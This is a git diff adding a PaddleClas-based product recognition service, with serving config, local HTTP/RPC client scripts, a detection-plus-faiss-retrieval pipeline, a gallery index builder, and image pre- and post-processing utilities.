rpc_port和http_port不允许同时为空。当rpc_port可用且http_port为空时,不自动生成http_port +http_port: 18081 +rpc_port: 9994 + +dag: + #op资源类型, True, 为线程模型;False,为进程模型 + is_thread_op: False +op: + rec: + 
#并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 1 + + #当op配置没有server_endpoints时,从local_service_conf读取本地服务配置 + local_service_conf: + + #uci模型路径 + model_config: ../../models/product_ResNet50_vd_aliproduct_v1.0_serving + + #计算硬件类型: 空缺时由devices决定(CPU/GPU),0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu + device_type: 1 + + #计算硬件ID,当devices为""或不写时为CPU预测;当devices为"0", "0,1,2"时为GPU预测,表示使用的GPU卡 + devices: "0" # "0,1" + + #client类型,包括brpc, grpc和local_predictor.local_predictor不启动Serving服务,进程内预测 + client_type: local_predictor + + #Fetch结果列表,以client_config中fetch_var的alias_name为准 + fetch_list: ["features"] + + det: + concurrency: 1 + local_service_conf: + client_type: local_predictor + device_type: 1 + devices: '0' + fetch_list: + - save_infer_model/scale_0.tmp_1 + model_config: ../../models/ppyolov2_r50vd_dcn_mainbody_v1.0_serving/ \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg b/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg new file mode 100644 index 0000000..fc64a95 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt b/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt new file mode 100644 index 0000000..35e26a6 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt @@ -0,0 +1,2 @@ +foreground +background \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py new file mode 100644 index 0000000..aa0cb54 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py @@ -0,0 +1,21 @@ +import requests +import json +import base64 +import 
import requests
import json
import base64
import os

# Sample image shipped alongside this script.
imgpath = "daoxiangcunjinzhubing_6.jpg"


def cv2_to_base64(image):
    """Encode raw image bytes as a UTF-8 base64 string for transport."""
    return base64.b64encode(image).decode('utf8')


if __name__ == "__main__":
    # http_port configured in config.yml; "recognition" is the service name.
    url = "http://127.0.0.1:18081/recognition/prediction"

    with open(os.path.join(".", imgpath), 'rb') as fh:
        raw_bytes = fh.read()
    payload = {"key": ["image"], "value": [cv2_to_base64(raw_bytes)]}

    # Send one prediction request and print the decoded JSON response.
    for _ in range(1):
        resp = requests.post(url=url, data=json.dumps(payload))
        print(resp.json())
# Prefer the GPU build of the pipeline client; fall back to the CPU build.
try:
    from paddle_serving_server_gpu.pipeline import PipelineClient
except ImportError:
    from paddle_serving_server.pipeline import PipelineClient
import base64

# Connect to the recognition pipeline server (rpc_port in config.yml).
client = PipelineClient()
client.connect(['127.0.0.1:9994'])

# Sample image shipped alongside this script.
imgpath = "daoxiangcunjinzhubing_6.jpg"


def cv2_to_base64(image):
    """Encode raw image bytes as a UTF-8 base64 string for transport."""
    return base64.b64encode(image).decode('utf8')


if __name__ == "__main__":
    with open(imgpath, 'rb') as fh:
        raw_bytes = fh.read()
    encoded = cv2_to_base64(raw_bytes)

    # Send one RPC request and print the recognition result.
    for _ in range(1):
        response = client.predict(feed_dict={"image": encoded},
                                  fetch=["result"])
        print(response)
from paddle_serving_server.web_service import WebService, Op
import logging
import numpy as np
import sys
import cv2
from paddle_serving_app.reader import *
import base64
import os
import faiss
import pickle
import json


class DetOp(Op):
    """Mainbody-detection op: finds candidate object boxes in the request
    image and forwards the raw image plus the kept boxes to RecOp."""

    def init_op(self):
        # Detector input pipeline: BGR->RGB, scale to [0, 1], normalize with
        # ImageNet mean/std, resize to the fixed 640x640 input, HWC->CHW.
        self.img_preprocess = Sequential([
            BGR2RGB(), Div(255.0),
            Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], False),
            Resize((640, 640)), Transpose((2, 0, 1))
        ])

        self.img_postprocess = RCNNPostprocess("label_list.txt", "output")
        self.threshold = 0.2        # drop detections scored below this
        self.max_det_results = 5    # keep at most the top-5 detections

    def generate_scale(self, im):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
        Returns:
            im_scale_y: the resize ratio of Y
            im_scale_x: the resize ratio of X
        """
        target_size = [640, 640]
        origin_shape = im.shape[:2]
        resize_h, resize_w = target_size
        im_scale_y = resize_h / float(origin_shape[0])
        im_scale_x = resize_w / float(origin_shape[1])
        return im_scale_y, im_scale_x

    def preprocess(self, input_dicts, data_id, log_id):
        """Decode the base64-encoded image(s) and build the detector feed."""
        (_, input_dict), = input_dicts.items()
        imgs = []
        raw_imgs = []
        for key in input_dict.keys():
            data = base64.b64decode(input_dict[key].encode('utf8'))
            raw_imgs.append(data)
            # np.frombuffer replaces the deprecated np.fromstring; identical
            # behaviour for raw binary input (and consistent with RecOp).
            data = np.frombuffer(data, np.uint8)
            raw_im = cv2.imdecode(data, cv2.IMREAD_COLOR)

            im_scale_y, im_scale_x = self.generate_scale(raw_im)
            im = self.img_preprocess(raw_im)

            imgs.append({
                "image": im[np.newaxis, :],
                "im_shape":
                np.array(list(im.shape[1:])).reshape(-1)[np.newaxis, :],
                "scale_factor":
                np.array([im_scale_y, im_scale_x]).astype('float32'),
            })
        # NOTE(review): per-request state stored on the Op instance; this
        # presumably relies on concurrency=1 per process — confirm before
        # raising the op's concurrency in config.yml.
        self.raw_img = raw_imgs

        feed_dict = {
            "image": np.concatenate(
                [x["image"] for x in imgs], axis=0),
            "im_shape": np.concatenate(
                [x["im_shape"] for x in imgs], axis=0),
            "scale_factor": np.concatenate(
                [x["scale_factor"] for x in imgs], axis=0)
        }
        return feed_dict, False, None, ""

    def postprocess(self, input_dicts, fetch_dict, log_id):
        """Keep the highest-scoring boxes and pass them downstream as JSON."""
        boxes = self.img_postprocess(fetch_dict, visualize=False)
        boxes.sort(key=lambda x: x["score"], reverse=True)
        boxes = filter(lambda x: x["score"] >= self.threshold,
                       boxes[:self.max_det_results])
        boxes = list(boxes)
        # Convert [x, y, w, h] boxes to inclusive [x1, y1, x2, y2] corners.
        for i in range(len(boxes)):
            boxes[i]["bbox"][2] += boxes[i]["bbox"][0] - 1
            boxes[i]["bbox"][3] += boxes[i]["bbox"][1] - 1
        result = json.dumps(boxes)
        res_dict = {"bbox_result": result, "image": self.raw_img}
        return res_dict, None, ""


class RecOp(Op):
    """Recognition op: embeds each detected crop and retrieves the nearest
    gallery entry from the faiss index."""

    def init_op(self):
        # Recognition input pipeline for 224x224 crops.
        self.seq = Sequential([
            BGR2RGB(), Resize((224, 224)), Div(255),
            Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], False),
            Transpose((2, 0, 1))
        ])

        index_dir = "../../recognition_demo_data_v1.1/gallery_product/index"
        assert os.path.exists(os.path.join(
            index_dir, "vector.index")), "vector.index not found ..."
        assert os.path.exists(os.path.join(
            index_dir, "id_map.pkl")), "id_map.pkl not found ... "

        self.searcher = faiss.read_index(
            os.path.join(index_dir, "vector.index"))

        with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd:
            self.id_map = pickle.load(fd)

        # (renamed from the original's misspelled "rec_nms_thresold")
        self.rec_nms_threshold = 0.05  # IoU threshold for NMS over results
        self.rec_score_thres = 0.5     # minimum retrieval score kept
        self.feature_normalize = True  # L2-normalize features before search
        self.return_k = 1              # top-k gallery entries per query

    def preprocess(self, input_dicts, data_id, log_id):
        """Crop every detected box (plus the whole image) and batch them."""
        (_, input_dict), = input_dicts.items()
        raw_img = input_dict["image"][0]
        data = np.frombuffer(raw_img, np.uint8)
        origin_img = cv2.imdecode(data, cv2.IMREAD_COLOR)
        dt_boxes = input_dict["bbox_result"]
        boxes = json.loads(dt_boxes)
        # Always also try the full image, in case detection missed the object.
        boxes.append({
            "category_id": 0,
            "score": 1.0,
            "bbox": [0, 0, origin_img.shape[1], origin_img.shape[0]]
        })
        # NOTE(review): per-request state on the Op instance (see DetOp).
        self.det_boxes = boxes

        # Construct a batch of crops for the recognition model.
        imgs = []
        for box in boxes:
            box = [int(x) for x in box["bbox"]]
            im = origin_img[box[1]:box[3], box[0]:box[2]].copy()
            img = self.seq(im)
            imgs.append(img[np.newaxis, :].copy())

        input_imgs = np.concatenate(imgs, axis=0)
        return {"x": input_imgs}, False, None, ""

    def nms_to_rec_results(self, results, thresh=0.1):
        """Greedy IoU-based non-maximum suppression over recognition results,
        keeping the highest-scoring result among overlapping boxes."""
        filtered_results = []
        x1 = np.array([r["bbox"][0] for r in results]).astype("float32")
        y1 = np.array([r["bbox"][1] for r in results]).astype("float32")
        x2 = np.array([r["bbox"][2] for r in results]).astype("float32")
        y2 = np.array([r["bbox"][3] for r in results]).astype("float32")
        scores = np.array([r["rec_scores"] for r in results])

        areas = (x2 - x1 + 1) * (y2 - y1 + 1)
        order = scores.argsort()[::-1]
        while order.size > 0:
            i = order[0]
            xx1 = np.maximum(x1[i], x1[order[1:]])
            yy1 = np.maximum(y1[i], y1[order[1:]])
            xx2 = np.minimum(x2[i], x2[order[1:]])
            yy2 = np.minimum(y2[i], y2[order[1:]])

            w = np.maximum(0.0, xx2 - xx1 + 1)
            h = np.maximum(0.0, yy2 - yy1 + 1)
            inter = w * h
            ovr = inter / (areas[i] + areas[order[1:]] - inter)
            inds = np.where(ovr <= thresh)[0]
            order = order[inds + 1]
            filtered_results.append(results[i])
        return filtered_results

    def postprocess(self, input_dicts, fetch_dict, log_id):
        """Search the gallery with each crop's feature and NMS the matches."""
        batch_features = fetch_dict["features"]

        if self.feature_normalize:
            feas_norm = np.sqrt(
                np.sum(np.square(batch_features), axis=1, keepdims=True))
            batch_features = np.divide(batch_features, feas_norm)

        scores, docs = self.searcher.search(batch_features, self.return_k)

        results = []
        for i in range(scores.shape[0]):
            pred = {}
            if scores[i][0] >= self.rec_score_thres:
                pred["bbox"] = [int(x) for x in self.det_boxes[i]["bbox"]]
                pred["rec_docs"] = self.id_map[docs[i][0]].split()[1]
                pred["rec_scores"] = scores[i][0]
                results.append(pred)

        # Deduplicate overlapping boxes that matched the same product.
        results = self.nms_to_rec_results(results, self.rec_nms_threshold)
        return {"result": str(results)}, None, ""


class RecognitionService(WebService):
    """Pipeline web service: the detection op feeds the recognition op."""

    def get_pipeline_response(self, read_op):
        det_op = DetOp(name="det", input_ops=[read_op])
        rec_op = RecOp(name="rec", input_ops=[det_op])
        return rec_op


product_recog_service = RecognitionService(name="recognition")
product_recog_service.prepare_pipeline_config("config.yml")
product_recog_service.run_service()
--git a/Smart_container/PaddleClas/deploy/python/__init__.py b/Smart_container/PaddleClas/deploy/python/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/python/build_gallery.py b/Smart_container/PaddleClas/deploy/python/build_gallery.py new file mode 100644 index 0000000..7b69a04 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/build_gallery.py @@ -0,0 +1,214 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
import os
import sys

__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.abspath(os.path.join(__dir__, '../')))

import cv2
import faiss
import numpy as np
from tqdm import tqdm
import pickle

from python.predict_rec import RecPredictor

from utils import logger
from utils import config


def split_datafile(data_file, image_root, delimiter="\t"):
    '''
    Read the gallery data file and return image paths plus their doc lines.

    data_file: each line holds an image path and its label/info, separated
        by `delimiter`
    image_root: root directory the image paths are relative to
    delimiter: field separator used in data_file (default: tab)
    '''
    gallery_images = []
    gallery_docs = []
    with open(data_file, 'r', encoding='utf-8') as f:
        lines = f.readlines()
        for _, ori_line in enumerate(lines):
            line = ori_line.strip().split(delimiter)
            text_num = len(line)
            assert text_num >= 2, f"line({ori_line}) must be splitted into at least 2 parts, but got {text_num}"
            image_file = os.path.join(image_root, line[0])

            gallery_images.append(image_file)
            gallery_docs.append(ori_line.strip())

    return gallery_images, gallery_docs


class GalleryBuilder(object):
    """Build or update the faiss gallery index described by
    config['IndexProcess']."""

    def __init__(self, config):
        self.config = config
        self.rec_predictor = RecPredictor(config)
        assert 'IndexProcess' in config.keys(), "Index config not found ... "
        self.build(config['IndexProcess'])

    def build(self, config):
        '''
        Build (or update) the index according to config["index_operation"]:
        "new" creates a fresh index, "append" adds to an existing one, and
        "remove" deletes entries whose doc lines appear in the data file.
        '''
        operation_method = config.get("index_operation", "new").lower()

        gallery_images, gallery_docs = split_datafile(
            config['data_file'], config['image_root'], config['delimiter'])

        # When removing data from the index, no feature extraction is needed.
        if operation_method != "remove":
            gallery_features = self._extract_features(gallery_images, config)
        assert operation_method in [
            "new", "remove", "append"
        ], "Only append, remove and new operation are supported"

        # vector.index: faiss index file
        # id_map.pkl: maps faiss ids to image doc lines
        if operation_method in ["remove", "append"]:
            # If removing or appending, vector.index and id_map.pkl must
            # already exist.
            # BUGFIX: `assert os.path.join(...)` is always truthy (a non-empty
            # string), so the original checks never fired; use os.path.exists.
            assert os.path.exists(
                os.path.join(config["index_dir"], "vector.index")
            ), "The vector.index does not exist in {} when 'index_operation' is not None".format(
                config["index_dir"])
            assert os.path.exists(
                os.path.join(config["index_dir"], "id_map.pkl")
            ), "The id_map.pkl does not exist in {} when 'index_operation' is not None".format(
                config["index_dir"])
            index = faiss.read_index(
                os.path.join(config["index_dir"], "vector.index"))
            with open(os.path.join(config["index_dir"], "id_map.pkl"),
                      'rb') as fd:
                ids = pickle.load(fd)
            assert index.ntotal == len(ids.keys(
            )), "data number in index is not equal to the number in id_map"
        else:
            if not os.path.exists(config["index_dir"]):
                os.makedirs(config["index_dir"], exist_ok=True)
            index_method = config.get("index_method", "HNSW32")

            # For the IVF method, choose the number of lists automatically
            # from the gallery size (capped at 65536).
            if index_method == "IVF":
                index_method = index_method + str(
                    min(int(len(gallery_images) // 8), 65536)) + ",Flat"

            # For a binary index, prepend "B" to the factory string.
            if config["dist_type"] == "hamming":
                index_method = "B" + index_method

            # dist_type
            dist_type = faiss.METRIC_INNER_PRODUCT if config[
                "dist_type"] == "IP" else faiss.METRIC_L2

            # build index
            if config["dist_type"] == "hamming":
                index = faiss.index_binary_factory(config["embedding_size"],
                                                   index_method)
            else:
                index = faiss.index_factory(config["embedding_size"],
                                            index_method, dist_type)
                index = faiss.IndexIDMap2(index)
            ids = {}

        if config["index_method"] == "HNSW32":
            logger.warning(
                "The HNSW32 method does not support 'remove' operation")

        if operation_method != "remove":
            # Assign fresh, monotonically increasing ids for the new data.
            start_id = max(ids.keys()) + 1 if ids else 0
            ids_now = (
                np.arange(0, len(gallery_images)) + start_id).astype(np.int64)

            # Only train when creating a new index file.
            if operation_method == "new":
                if config["dist_type"] == "hamming":
                    index.add(gallery_features)
                else:
                    index.train(gallery_features)

            if not config["dist_type"] == "hamming":
                index.add_with_ids(gallery_features, ids_now)

            for i, d in zip(list(ids_now), gallery_docs):
                ids[i] = d
        else:
            if config["index_method"] == "HNSW32":
                raise RuntimeError(
                    "The index_method: HNSW32 does not support 'remove' operation"
                )
            # Remove ids from id_map and the matching vectors from the index.
            remove_ids = list(
                filter(lambda k: ids.get(k) in gallery_docs, ids.keys()))
            remove_ids = np.asarray(remove_ids)
            index.remove_ids(remove_ids)
            for k in remove_ids:
                del ids[k]

        # Persist the faiss index file and the id_map file.
        if config["dist_type"] == "hamming":
            faiss.write_index_binary(
                index, os.path.join(config["index_dir"], "vector.index"))
        else:
            faiss.write_index(
                index, os.path.join(config["index_dir"], "vector.index"))

        with open(os.path.join(config["index_dir"], "id_map.pkl"), 'wb') as fd:
            pickle.dump(ids, fd)

    def _extract_features(self, gallery_images, config):
        """Run the rec model over all gallery images and stack the features
        into one (num_images, embedding_size) array."""
        if config["dist_type"] == "hamming":
            gallery_features = np.zeros(
                [len(gallery_images), config['embedding_size'] // 8],
                dtype=np.uint8)
        else:
            gallery_features = np.zeros(
                [len(gallery_images), config['embedding_size']],
                dtype=np.float32)

        # Construct batches of images and run inference.
        batch_size = config.get("batch_size", 32)
        batch_img = []
        for i, image_file in enumerate(tqdm(gallery_images)):
            img = cv2.imread(image_file)
            if img is None:
                logger.error("img empty, please check {}".format(image_file))
                sys.exit(1)  # non-zero exit status on unreadable input
            img = img[:, :, ::-1]  # BGR -> RGB
            batch_img.append(img)

            if (i + 1) % batch_size == 0:
                rec_feat = self.rec_predictor.predict(batch_img)
                gallery_features[i - batch_size + 1:i + 1, :] = rec_feat
                batch_img = []

        # Flush the final, possibly partial batch.
        if len(batch_img) > 0:
            rec_feat = self.rec_predictor.predict(batch_img)
            gallery_features[-len(batch_img):, :] = rec_feat
            batch_img = []

        return gallery_features


def main(config):
    GalleryBuilder(config)
    return


if __name__ == "__main__":
    args = config.parse_args()
    config = config.get_config(args.config, overrides=args.override, show=True)
    main(config)
import cv2
import numpy as np


def decode_image(im_file, im_info):
    """read rgb image
    Args:
        im_file (str|np.ndarray): input can be image path or np.ndarray
        im_info (dict): info of image
    Returns:
        im (np.ndarray): processed image (np.ndarray)
        im_info (dict): info of processed image
    """
    if isinstance(im_file, str):
        with open(im_file, 'rb') as f:
            im_read = f.read()
        data = np.frombuffer(im_read, dtype='uint8')
        im = cv2.imdecode(data, 1)  # BGR mode, but need RGB mode
        im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
    else:
        im = im_file
    im_info['im_shape'] = np.array(im.shape[:2], dtype=np.float32)
    im_info['scale_factor'] = np.array([1., 1.], dtype=np.float32)
    return im, im_info


class DetResize(object):
    """resize image by target_size and max_size
    Args:
        target_size (int|list[int]): the target size of image
        keep_ratio (bool): whether keep_ratio or not, default true
        interp (int): method of resize
    """

    def __init__(
            self,
            target_size,
            keep_ratio=True,
            interp=cv2.INTER_LINEAR, ):
        if isinstance(target_size, int):
            target_size = [target_size, target_size]
        self.target_size = target_size
        self.keep_ratio = keep_ratio
        self.interp = interp

    def __call__(self, im, im_info):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
            im_info (dict): info of image
        Returns:
            im (np.ndarray): processed image (np.ndarray)
            im_info (dict): info of processed image
        """
        assert len(self.target_size) == 2
        assert self.target_size[0] > 0 and self.target_size[1] > 0
        im_scale_y, im_scale_x = self.generate_scale(im)
        # Record the post-resize spatial dims for the model's input_shape.
        im_info['input_shape'][1] = int(im_scale_y * im.shape[0])
        im_info['input_shape'][2] = int(im_scale_x * im.shape[1])
        im = cv2.resize(
            im,
            None,
            None,
            fx=im_scale_x,
            fy=im_scale_y,
            interpolation=self.interp)
        im_info['im_shape'] = np.array(im.shape[:2]).astype('float32')
        im_info['scale_factor'] = np.array(
            [im_scale_y, im_scale_x]).astype('float32')
        return im, im_info

    def generate_scale(self, im):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
        Returns:
            im_scale_y: the resize ratio of Y
            im_scale_x: the resize ratio of X
        """
        origin_shape = im.shape[:2]
        if self.keep_ratio:
            # Scale so the short side reaches target min, unless the long
            # side would then exceed target max.
            im_size_min = np.min(origin_shape)
            im_size_max = np.max(origin_shape)
            target_size_min = np.min(self.target_size)
            target_size_max = np.max(self.target_size)
            im_scale = float(target_size_min) / float(im_size_min)
            if np.round(im_scale * im_size_max) > target_size_max:
                im_scale = float(target_size_max) / float(im_size_max)
            im_scale_x = im_scale
            im_scale_y = im_scale
        else:
            resize_h, resize_w = self.target_size
            im_scale_y = resize_h / float(origin_shape[0])
            im_scale_x = resize_w / float(origin_shape[1])
        return im_scale_y, im_scale_x


class DetNormalizeImage(object):
    """normalize image
    Args:
        mean (list): im - mean
        std (list): im / std
        is_scale (bool): whether need im / 255
    """

    def __init__(self, mean, std, is_scale=True):
        self.mean = mean
        self.std = std
        self.is_scale = is_scale

    def __call__(self, im, im_info):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
            im_info (dict): info of image
        Returns:
            im (np.ndarray): processed image (np.ndarray)
            im_info (dict): info of processed image
        """
        im = im.astype(np.float32, copy=False)
        mean = np.array(self.mean)[np.newaxis, np.newaxis, :]
        std = np.array(self.std)[np.newaxis, np.newaxis, :]

        if self.is_scale:
            im = im / 255.0

        im -= mean
        im /= std
        return im, im_info


class DetPermute(object):
    """permute image from HWC layout to CHW layout
    (The original docstring advertised `to_bgr` / `channel_first` parameters
    that this class never accepted; the conversion is always HWC -> CHW.)
    """

    def __init__(self, ):
        super().__init__()

    def __call__(self, im, im_info):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
            im_info (dict): info of image
        Returns:
            im (np.ndarray): processed image (np.ndarray)
            im_info (dict): info of processed image
        """
        im = im.transpose((2, 0, 1)).copy()
        return im, im_info


class DetPadStride(object):
    """padding image for model with FPN, instead of PadBatch(pad_to_stride,
    pad_gt) in the original config
    Args:
        stride (int): model with FPN needs image shape % stride == 0
    """

    def __init__(self, stride=0):
        self.coarsest_stride = stride

    def __call__(self, im, im_info):
        """
        Args:
            im (np.ndarray): image (np.ndarray)
            im_info (dict): info of image
        Returns:
            im (np.ndarray): processed image (np.ndarray)
            im_info (dict): info of processed image
        """
        coarsest_stride = self.coarsest_stride
        if coarsest_stride <= 0:
            # Padding disabled; pass the image through unchanged.
            return im, im_info
        im_c, im_h, im_w = im.shape
        pad_h = int(np.ceil(float(im_h) / coarsest_stride) * coarsest_stride)
        pad_w = int(np.ceil(float(im_w) / coarsest_stride) * coarsest_stride)
        padding_im = np.zeros((im_c, pad_h, pad_w), dtype=np.float32)
        padding_im[:, :im_h, :im_w] = im
        return padding_im, im_info


def det_preprocess(im, im_info, preprocess_ops):
    """Apply each preprocessing op in order, threading im/im_info through."""
    for operator in preprocess_ops:
        im, im_info = operator(im, im_info)
    return im, im_info
import os
import copy
import shutil
from functools import partial
import importlib
import numpy as np
# NOTE(review): removed unused `paddle` / `paddle.nn.functional` imports --
# nothing in this module references them.


def build_postprocess(config):
    """Build a PostProcesser from a config dict.

    Each remaining key in `config` names a postprocess class defined in this
    module; its value is the kwargs dict for that class.  The optional
    "main_indicator" entry selects which operator's output is returned.
    """
    if config is None:
        return None

    mod = importlib.import_module(__name__)
    config = copy.deepcopy(config)

    main_indicator = config.pop(
        "main_indicator") if "main_indicator" in config else None
    main_indicator = main_indicator if main_indicator else ""

    func_list = []
    for func in config:
        func_list.append(getattr(mod, func)(**config[func]))
    return PostProcesser(func_list, main_indicator)


class PostProcesser(object):
    """Run a list of postprocess operators and return the main one's output."""

    def __init__(self, func_list, main_indicator="Topk"):
        self.func_list = func_list
        self.main_indicator = main_indicator

    def __call__(self, x, image_file=None):
        rtn = None
        for func in self.func_list:
            tmp = func(x, image_file)
            # substring match against main_indicator, e.g. "Topk" in "Topk"
            if type(func).__name__ in self.main_indicator:
                rtn = tmp
        return rtn


class Topk(object):
    """Decode top-k class ids/scores (and optional label names) per sample."""

    def __init__(self, topk=1, class_id_map_file=None):
        assert isinstance(topk, (int, ))
        self.class_id_map = self.parse_class_id_map(class_id_map_file)
        self.topk = topk

    def parse_class_id_map(self, class_id_map_file):
        """Parse an "id label" mapping file; return a dict, or None."""
        if class_id_map_file is None:
            return None

        if not os.path.exists(class_id_map_file):
            print(
                "Warning: If want to use your own label_dict, please input legal path!\nOtherwise label_names will be empty!"
            )
            return None

        try:
            class_id_map = {}
            with open(class_id_map_file, "r") as fin:
                lines = fin.readlines()
                for line in lines:
                    # split on the FIRST space: "<id> <label text>"
                    partition = line.split("\n")[0].partition(" ")
                    class_id_map[int(partition[0])] = str(partition[-1])
        except Exception as ex:
            print(ex)
            class_id_map = None
        return class_id_map

    def __call__(self, x, file_names=None, multilabel=False):
        """Decode a (batch, num_classes) score array into result dicts.

        In multilabel mode all classes with prob >= 0.5 are returned
        instead of the top-k.
        """
        if file_names is not None:
            assert x.shape[0] == len(file_names)
        y = []
        for idx, probs in enumerate(x):
            index = probs.argsort(axis=0)[-self.topk:][::-1].astype(
                "int32") if not multilabel else np.where(
                    probs >= 0.5)[0].astype("int32")
            clas_id_list = []
            score_list = []
            label_name_list = []
            for i in index:
                clas_id_list.append(i.item())
                score_list.append(probs[i].item())
                if self.class_id_map is not None:
                    label_name_list.append(self.class_id_map[i.item()])
            result = {
                "class_ids": clas_id_list,
                "scores": np.around(
                    score_list, decimals=5).tolist(),
            }
            if file_names is not None:
                result["file_name"] = file_names[idx]
            # NOTE(review): always true (label_name_list is a list); kept
            # so "label_names" stays present (possibly empty) for callers.
            if label_name_list is not None:
                result["label_names"] = label_name_list
            y.append(result)
        return y


class MultiLabelTopk(Topk):
    """Multi-label variant of Topk: threshold 0.5 instead of top-k."""

    def __init__(self, topk=1, class_id_map_file=None):
        # BUGFIX: previously called super().__init__() with no arguments,
        # silently discarding `topk` and `class_id_map_file`.
        super().__init__(topk, class_id_map_file)

    def __call__(self, x, file_names=None):
        return super().__call__(x, file_names, multilabel=True)


class SavePreLabel(object):
    """Copy each input image into a subdir named after its top-1 class id."""

    def __init__(self, save_dir):
        if save_dir is None:
            raise Exception(
                "Please specify save_dir if SavePreLabel specified.")
        # partial so self.save_dir(x) == os.path.join(save_dir, x)
        self.save_dir = partial(os.path.join, save_dir)

    def __call__(self, x, file_names=None):
        if file_names is None:
            return
        assert x.shape[0] == len(file_names)
        for idx, probs in enumerate(x):
            index = probs.argsort(axis=0)[-1].astype("int32")
            self.save(index, file_names[idx])

    def save(self, id, image_file):
        output_dir = self.save_dir(str(id))
        os.makedirs(output_dir, exist_ok=True)
        shutil.copy(image_file, output_dir)


class Binarize(object):
    """Pack feature vectors into binary codes (8 dims -> 1 byte).

    Args:
        method (str): "round" or "sign"; any other value leaves x untouched
            before packing.
    """

    def __init__(self, method="round"):
        self.method = method
        # column vector of bit weights, MSB first
        self.unit = np.array([[128, 64, 32, 16, 8, 4, 2, 1]]).T

    def __call__(self, x, file_names=None):
        if self.method == "round":
            x = np.round(x + 1).astype("uint8") - 1

        if self.method == "sign":
            x = ((np.sign(x) + 1) / 2).astype("uint8")

        embedding_size = x.shape[1]
        assert embedding_size % 8 == 0, "The Binary index only support vectors with sizes multiple of 8"

        byte = np.zeros([x.shape[0], embedding_size // 8], dtype=np.uint8)
        for i in range(embedding_size // 8):
            byte[:, i:i + 1] = np.dot(x[:, i * 8:(i + 1) * 8], self.unit)

        return byte
# NOTE(review): this block relies on module-level imports declared at the
# top of this file: os, pickle, cv2, faiss, numpy as np, utils.config,
# draw_bbox_results, get_image_list, DetPredictor, RecPredictor.


class SystemPredictor(object):
    """Detection + retrieval pipeline: detect boxes, embed each crop with the
    recognition model, and look the embedding up in a faiss index."""

    def __init__(self, config):
        self.config = config
        self.rec_predictor = RecPredictor(config)
        self.det_predictor = DetPredictor(config)

        assert 'IndexProcess' in config.keys(), "Index config not found ... "
        self.return_k = self.config['IndexProcess']['return_k']

        index_dir = self.config["IndexProcess"]["index_dir"]
        assert os.path.exists(os.path.join(
            index_dir, "vector.index")), "vector.index not found ..."
        assert os.path.exists(os.path.join(
            index_dir, "id_map.pkl")), "id_map.pkl not found ... "

        if config['IndexProcess'].get("binary_index", False):
            self.Searcher = faiss.read_index_binary(
                os.path.join(index_dir, "vector.index"))
        else:
            self.Searcher = faiss.read_index(
                os.path.join(index_dir, "vector.index"))

        with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd:
            self.id_map = pickle.load(fd)

    def append_self(self, results, shape):
        """Append a whole-image pseudo-detection to improve recall."""
        results.append({
            "class_id": 0,
            "score": 1.0,
            "bbox":
            np.array([0, 0, shape[1], shape[0]]),  # xmin, ymin, xmax, ymax
            "label_name": "foreground",
        })
        return results

    def nms_to_rec_results(self, results, thresh=0.1):
        """Greedy IoU-based NMS over recognition results, highest
        `rec_scores` first; drops boxes overlapping a kept box by > thresh."""
        filtered_results = []
        x1 = np.array([r["bbox"][0] for r in results]).astype("float32")
        y1 = np.array([r["bbox"][1] for r in results]).astype("float32")
        x2 = np.array([r["bbox"][2] for r in results]).astype("float32")
        y2 = np.array([r["bbox"][3] for r in results]).astype("float32")
        scores = np.array([r["rec_scores"] for r in results])

        areas = (x2 - x1 + 1) * (y2 - y1 + 1)
        order = scores.argsort()[::-1]
        while order.size > 0:
            i = order[0]
            xx1 = np.maximum(x1[i], x1[order[1:]])
            yy1 = np.maximum(y1[i], y1[order[1:]])
            xx2 = np.minimum(x2[i], x2[order[1:]])
            yy2 = np.minimum(y2[i], y2[order[1:]])

            w = np.maximum(0.0, xx2 - xx1 + 1)
            h = np.maximum(0.0, yy2 - yy1 + 1)
            inter = w * h
            ovr = inter / (areas[i] + areas[order[1:]] - inter)
            inds = np.where(ovr <= thresh)[0]
            order = order[inds + 1]
            filtered_results.append(results[i])

        return filtered_results

    def predict(self, img):
        """Full pipeline for one RGB image; returns recognized results."""
        output = []
        # st1: get all detection results
        results = self.det_predictor.predict(img)

        # st2: add the whole image for recognition to improve recall
        results = self.append_self(results, img.shape)

        # st3: recognition process, use score_thres to ensure accuracy
        for result in results:
            preds = {}
            xmin, ymin, xmax, ymax = result["bbox"].astype("int")
            crop_img = img[ymin:ymax, xmin:xmax, :].copy()
            rec_results = self.rec_predictor.predict(crop_img)
